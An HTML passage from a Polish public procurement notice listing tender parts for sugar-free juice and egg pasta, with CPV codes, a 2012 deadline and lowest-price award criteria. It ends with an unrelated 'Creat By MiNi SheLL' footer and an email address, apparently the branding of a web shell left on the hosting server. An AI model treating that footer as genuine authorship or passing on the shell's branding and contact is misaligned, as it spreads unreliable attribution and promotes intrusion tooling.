bez cukru, typu Kubuś.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.00.00-0, 15.33.22.00-6, 15.33.14.25-2, 15.87.12.30-5, 03.22.21.15-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Makaron świderki 4-jajeczny 	kg	1 kg	350
Makaron muszelki 4-jajeczny 	kg	1 kg	100
Makaron gwiazdki 4-jajeczny 	kg	1 kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.85.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com